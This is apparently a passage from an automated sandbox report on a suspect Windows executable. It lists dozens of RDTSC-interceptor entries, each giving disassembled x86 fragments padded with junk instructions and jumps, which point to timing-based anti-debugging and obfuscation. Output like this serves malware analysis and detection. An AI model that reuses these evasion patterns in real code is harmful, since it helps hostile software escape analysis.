Source: C:\Users\user\Desktop\0zBsv1tnt4.exe RDTSC instruction interceptor: First address: BE2CC8 second address: BE2CCC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe RDTSC instruction interceptor: First address: BEF87E second address: BEF882 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe RDTSC instruction interceptor: First address: BEF882 second address: BEF886 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe RDTSC instruction interceptor: First address: BEF886 second address: BEF8A2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007FC22CC1B8A6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jmp 00007FC22CC1B8B0h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe RDTSC instruction interceptor: First address: BEF8A2 second address: BEF8F0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FC22D01ECD8h 0x00000008 jmp 00007FC22D01ECD9h 0x0000000d jmp 00007FC22D01ECD8h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe RDTSC instruction interceptor: First address: BEF42A second address: BEF43D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FC22CC1B8ADh 0x00000009 push esi 0x0000000a pop esi 0x0000000b rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe RDTSC instruction interceptor: First address: BEF43D second address: BEF441 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe RDTSC instruction interceptor: First address: BFAAFB second address: BFAB05 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007FC22CC1B8A6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe RDTSC instruction interceptor: First address: BFAB05 second address: BFAB0A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe RDTSC instruction interceptor: First address: BFAB0A second address: BFAB10 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe RDTSC instruction interceptor: First address: BFC19D second address: BFC1A3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe RDTSC instruction interceptor: First address: C0DF2F second address: C0DF5A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 jo 00007FC22CC1B8A6h 0x0000000e popad 0x0000000f popad 0x00000010 pushad 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007FC22CC1B8B6h 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe RDTSC instruction interceptor: First address: C0DF5A second address: C0DF5E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe RDTSC instruction interceptor: First address: C0DF5E second address: C0DF6C instructions: 0x00000000 rdtsc 0x00000002 jo 00007FC22CC1B8A6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push ebx 0x0000000d pop ebx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe RDTSC instruction interceptor: First address: C0DF6C second address: C0DF8F instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007FC22D01ECD9h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe RDTSC instruction interceptor: First address: C0DF8F second address: C0DF93 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe RDTSC instruction interceptor: First address: C0C862 second address: C0C884 instructions: 0x00000000 rdtsc 0x00000002 jg 00007FC22D01ECC6h 0x00000008 jmp 00007FC22D01ECD3h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f popad 0x00000010 pushad 0x00000011 push ecx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe RDTSC instruction interceptor: First address: C0C884 second address: C0C88C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe RDTSC instruction interceptor: First address: C0CB14 second address: C0CB1E instructions: 0x00000000 rdtsc 0x00000002 jl 00007FC22D01ECCCh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe RDTSC instruction interceptor: First address: C0CDB1 second address: C0CDE2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop ebx 0x00000007 jl 00007FC22CC1B8AAh 0x0000000d push eax 0x0000000e pop eax 0x0000000f pushad 0x00000010 popad 0x00000011 push esi 0x00000012 push eax 0x00000013 pop eax 0x00000014 pushad 0x00000015 popad 0x00000016 pop esi 0x00000017 popad 0x00000018 push eax 0x00000019 push edx 0x0000001a jmp 00007FC22CC1B8B7h 0x0000001f rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe RDTSC instruction interceptor: First address: C0DC78 second address: C0DC8D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 jmp 00007FC22D01ECD0h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe RDTSC instruction interceptor: First address: C11607 second address: C11612 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007FC22CC1B8A6h 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe RDTSC instruction interceptor: First address: C2BBEB second address: C2BC18 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007FC22D01ECCEh 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FC22D01ECD9h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe RDTSC instruction interceptor: First address: C2BC18 second address: C2BC31 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FC22CC1B8B3h 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe RDTSC instruction interceptor: First address: C2BA5F second address: C2BA76 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jmp 00007FC22D01ECD0h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe RDTSC instruction interceptor: First address: C2BA76 second address: C2BA9D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push edx 0x00000009 push ebx 0x0000000a push edi 0x0000000b pop edi 0x0000000c pop ebx 0x0000000d ja 00007FC22CC1B8BAh 0x00000013 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe RDTSC instruction interceptor: First address: C2BA9D second address: C2BAA3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe RDTSC instruction interceptor: First address: C2E813 second address: C2E81D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007FC22CC1B8A6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe RDTSC instruction interceptor: First address: C2E81D second address: C2E82B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC22D01ECCAh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe RDTSC instruction interceptor: First address: C2E82B second address: C2E842 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FC22CC1B8B1h 0x0000000b rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe RDTSC instruction interceptor: First address: C30873 second address: C30880 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 jo 00007FC22D01ECC6h 0x0000000d rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe RDTSC instruction interceptor: First address: C30880 second address: C30884 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe RDTSC instruction interceptor: First address: C30884 second address: C3088A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe RDTSC instruction interceptor: First address: C3088A second address: C3088F instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe RDTSC instruction interceptor: First address: C303F5 second address: C303F9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe RDTSC instruction interceptor: First address: C303F9 second address: C3040C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007FC22CC1B8ADh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe RDTSC instruction interceptor: First address: C3040C second address: C3041A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 pushad 0x00000006 popad 0x00000007 pushad 0x00000008 popad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c push edx 0x0000000d pop edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe RDTSC instruction interceptor: First address: C3041A second address: C30420 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe RDTSC instruction interceptor: First address: C45735 second address: C4573B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe RDTSC instruction interceptor: First address: C45884 second address: C4588B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe RDTSC instruction interceptor: First address: C4588B second address: C45891 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe RDTSC instruction interceptor: First address: C45891 second address: C45896 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe RDTSC instruction interceptor: First address: C45896 second address: C4589C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe RDTSC instruction interceptor: First address: C4589C second address: C458A2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe RDTSC instruction interceptor: First address: C458A2 second address: C458D2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push eax 0x0000000a jmp 00007FC22D01ECD8h 0x0000000f jmp 00007FC22D01ECCAh 0x00000014 pop eax 0x00000015 push eax 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe RDTSC instruction interceptor: First address: C458D2 second address: C458DB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe RDTSC instruction interceptor: First address: C458DB second address: C458EC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC22D01ECCDh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe RDTSC instruction interceptor: First address: C45A58 second address: C45A65 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b push ecx 0x0000000c pop ecx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe RDTSC instruction interceptor: First address: C45A65 second address: C45A7C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC22D01ECD3h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe RDTSC instruction interceptor: First address: C45D39 second address: C45D57 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 ja 00007FC22CC1B8B6h 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe RDTSC instruction interceptor: First address: C45EDB second address: C45EF9 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FC22D01ECC6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FC22D01ECD2h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe RDTSC instruction interceptor: First address: C45EF9 second address: C45EFE instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe RDTSC instruction interceptor: First address: C4604E second address: C46052 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe RDTSC instruction interceptor: First address: C46052 second address: C46058 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe RDTSC instruction interceptor: First address: C46058 second address: C46064 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jbe 00007FC22D01ECC6h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe RDTSC instruction interceptor: First address: C46064 second address: C46068 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe RDTSC instruction interceptor: First address: C46068 second address: C4606C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe RDTSC instruction interceptor: First address: C4606C second address: C46092 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007FC22CC1B8A6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 jns 00007FC22CC1B8ACh 0x00000016 jmp 00007FC22CC1B8AAh 0x0000001b rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe RDTSC instruction interceptor: First address: C491BF second address: C491C5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe RDTSC instruction interceptor: First address: C492BA second address: C492C4 instructions: 0x00000000 rdtsc 0x00000002 jl 00007FC22CC1B8A6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe RDTSC instruction interceptor: First address: C492C4 second address: C492CA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe RDTSC instruction interceptor: First address: C492CA second address: C492CE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe RDTSC instruction interceptor: First address: B5C103 second address: B5C107 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe RDTSC instruction interceptor: First address: 5120437 second address: 51204CE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movsx edi, cx 0x00000006 pushfd 0x00000007 jmp 00007FC22CC1B8AAh 0x0000000c or ax, 6F98h 0x00000011 jmp 00007FC22CC1B8ABh 0x00000016 popfd 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a xchg eax, ebp 0x0000001b pushad 0x0000001c pushfd 0x0000001d jmp 00007FC22CC1B8B4h 0x00000022 adc esi, 780699F8h 0x00000028 jmp 00007FC22CC1B8ABh 0x0000002d popfd 0x0000002e mov ch, 63h 0x00000030 popad 0x00000031 mov ebp, esp 0x00000033 pushad 0x00000034 mov dx, 77D4h 0x00000038 pushad 0x00000039 pushfd 0x0000003a jmp 00007FC22CC1B8B3h 0x0000003f sub ecx, 33370A6Eh 0x00000045 jmp 00007FC22CC1B8B9h 0x0000004a popfd 0x0000004b pushad 0x0000004c popad 0x0000004d popad 0x0000004e popad 0x0000004f mov edx, dword ptr [ebp+0Ch] 0x00000052 pushad 0x00000053 push eax 0x00000054 push edx 0x00000055 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe RDTSC instruction interceptor: First address: 51204CE second address: 51204D2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe RDTSC instruction interceptor: First address: 512056F second address: 5120587 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FC22CC1B8B4h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe RDTSC instruction interceptor: First address: 5150774 second address: 5150820 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FC22D01ECCFh 0x00000009 jmp 00007FC22D01ECD3h 0x0000000e popfd 0x0000000f movzx eax, dx 0x00000012 popad 0x00000013 pop edx 0x00000014 pop eax 0x00000015 push ebp 0x00000016 jmp 00007FC22D01ECD0h 0x0000001b mov dword ptr [esp], ebp 0x0000001e jmp 00007FC22D01ECD0h 0x00000023 mov ebp, esp 0x00000025 pushad 0x00000026 pushfd 0x00000027 jmp 00007FC22D01ECCEh 0x0000002c jmp 00007FC22D01ECD5h 0x00000031 popfd 0x00000032 mov dx, ax 0x00000035 popad 0x00000036 xchg eax, ecx 0x00000037 jmp 00007FC22D01ECCAh 0x0000003c push eax 0x0000003d jmp 00007FC22D01ECCBh 0x00000042 xchg eax, ecx 0x00000043 push eax 0x00000044 push edx 0x00000045 jmp 00007FC22D01ECD5h 0x0000004a rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe RDTSC instruction interceptor: First address: 5150820 second address: 5150844 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov edx, 4B739FA2h 0x00000008 mov edi, 0F1013EEh 0x0000000d popad 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push esp 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007FC22CC1B8B1h 0x00000018 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe RDTSC instruction interceptor: First address: 5150844 second address: 515088D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC22D01ECD1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], esi 0x0000000c pushad 0x0000000d mov ax, 2C03h 0x00000011 pushad 0x00000012 pushad 0x00000013 popad 0x00000014 popad 0x00000015 popad 0x00000016 lea eax, dword ptr [ebp-04h] 0x00000019 pushad 0x0000001a movzx eax, bx 0x0000001d mov ebx, 29D597DCh 0x00000022 popad 0x00000023 push ebx 0x00000024 push eax 0x00000025 push edx 0x00000026 jmp 00007FC22D01ECD7h 0x0000002b rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe RDTSC instruction interceptor: First address: 5150930 second address: 5150934 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe RDTSC instruction interceptor: First address: 5150934 second address: 5150951 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC22D01ECD9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe RDTSC instruction interceptor: First address: 5150998 second address: 51509EE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC22CC1B8B9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, esi 0x0000000b pushad 0x0000000c jmp 00007FC22CC1B8ACh 0x00000011 jmp 00007FC22CC1B8B2h 0x00000016 popad 0x00000017 pop esi 0x00000018 jmp 00007FC22CC1B8B0h 0x0000001d leave 0x0000001e push eax 0x0000001f push edx 0x00000020 pushad 0x00000021 push eax 0x00000022 push edx 0x00000023 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe RDTSC instruction interceptor: First address: 51509EE second address: 51509F3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe RDTSC instruction interceptor: First address: 51509F3 second address: 5150A09 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FC22CC1B8B2h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe RDTSC instruction interceptor: First address: 5150A09 second address: 5150A0D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe RDTSC instruction interceptor: First address: 5150A0D second address: 514002C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 retn 0004h 0x0000000b nop 0x0000000c sub esp, 04h 0x0000000f xor ebx, ebx 0x00000011 cmp eax, 00000000h 0x00000014 je 00007FC22CC1BA0Ah 0x0000001a mov dword ptr [esp], 0000000Dh 0x00000021 call 00007FC2313D7A41h 0x00000026 mov edi, edi 0x00000028 jmp 00007FC22CC1B8B0h 0x0000002d xchg eax, ebp 0x0000002e push eax 0x0000002f push edx 0x00000030 jmp 00007FC22CC1B8B7h 0x00000035 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe RDTSC instruction interceptor: First address: 514002C second address: 51400C2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FC22D01ECCFh 0x00000008 push esi 0x00000009 pop edx 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e pushad 0x0000000f pushfd 0x00000010 jmp 00007FC22D01ECCBh 0x00000015 sub cx, 636Eh 0x0000001a jmp 00007FC22D01ECD9h 0x0000001f popfd 0x00000020 mov ax, 24F7h 0x00000024 popad 0x00000025 xchg eax, ebp 0x00000026 pushad 0x00000027 pushfd 0x00000028 jmp 00007FC22D01ECD8h 0x0000002d add esi, 21A48A18h 0x00000033 jmp 00007FC22D01ECCBh 0x00000038 popfd 0x00000039 jmp 00007FC22D01ECD8h 0x0000003e popad 0x0000003f mov ebp, esp 0x00000041 pushad 0x00000042 push eax 0x00000043 push edx 0x00000044 mov edi, eax 0x00000046 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe RDTSC instruction interceptor: First address: 51400C2 second address: 51400C6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe RDTSC instruction interceptor: First address: 51400C6 second address: 514010D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov bx, cx 0x00000009 popad 0x0000000a sub esp, 2Ch 0x0000000d jmp 00007FC22D01ECD0h 0x00000012 xchg eax, ebx 0x00000013 pushad 0x00000014 pushfd 0x00000015 jmp 00007FC22D01ECCEh 0x0000001a or ecx, 717EDE08h 0x00000020 jmp 00007FC22D01ECCBh 0x00000025 popfd 0x00000026 push eax 0x00000027 push edx 0x00000028 mov ecx, 3A80EC95h 0x0000002d rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe RDTSC instruction interceptor: First address: 514010D second address: 5140111 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe RDTSC instruction interceptor: First address: 5140111 second address: 5140134 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 jmp 00007FC22D01ECD1h 0x0000000d xchg eax, ebx 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 mov si, bx 0x00000014 pushad 0x00000015 popad 0x00000016 popad 0x00000017 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe RDTSC instruction interceptor: First address: 5140134 second address: 51401A8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007FC22CC1B8B0h 0x00000008 pop ecx 0x00000009 pushfd 0x0000000a jmp 00007FC22CC1B8ABh 0x0000000f sbb ah, 0000005Eh 0x00000012 jmp 00007FC22CC1B8B9h 0x00000017 popfd 0x00000018 popad 0x00000019 pop edx 0x0000001a pop eax 0x0000001b xchg eax, edi 0x0000001c jmp 00007FC22CC1B8AEh 0x00000021 push eax 0x00000022 push eax 0x00000023 push edx 0x00000024 pushad 0x00000025 pushfd 0x00000026 jmp 00007FC22CC1B8ACh 0x0000002b sub ax, 8788h 0x00000030 jmp 00007FC22CC1B8ABh 0x00000035 popfd 0x00000036 pushad 0x00000037 popad 0x00000038 popad 0x00000039 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe RDTSC instruction interceptor: First address: 51401E2 second address: 51401E8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe RDTSC instruction interceptor: First address: 51401E8 second address: 5140297 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC22CC1B8ACh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 sub ebx, ebx 0x0000000b pushad 0x0000000c push edx 0x0000000d pushfd 0x0000000e jmp 00007FC22CC1B8AAh 0x00000013 add si, 3EA8h 0x00000018 jmp 00007FC22CC1B8ABh 0x0000001d popfd 0x0000001e pop ecx 0x0000001f call 00007FC22CC1B8B9h 0x00000024 pushfd 0x00000025 jmp 00007FC22CC1B8B0h 0x0000002a or eax, 1A50EC38h 0x00000030 jmp 00007FC22CC1B8ABh 0x00000035 popfd 0x00000036 pop esi 0x00000037 popad 0x00000038 mov edi, 00000000h 0x0000003d pushad 0x0000003e mov edx, esi 0x00000040 mov ecx, 53A136BDh 0x00000045 popad 0x00000046 inc ebx 0x00000047 push eax 0x00000048 push edx 0x00000049 pushad 0x0000004a pushad 0x0000004b popad 